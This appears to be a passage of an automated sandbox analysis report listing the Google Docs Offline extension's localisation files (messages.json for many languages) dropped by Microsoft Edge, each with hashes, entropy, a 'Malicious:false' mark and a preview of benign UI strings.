                                                                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7508_585911807\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                  Malicious:false
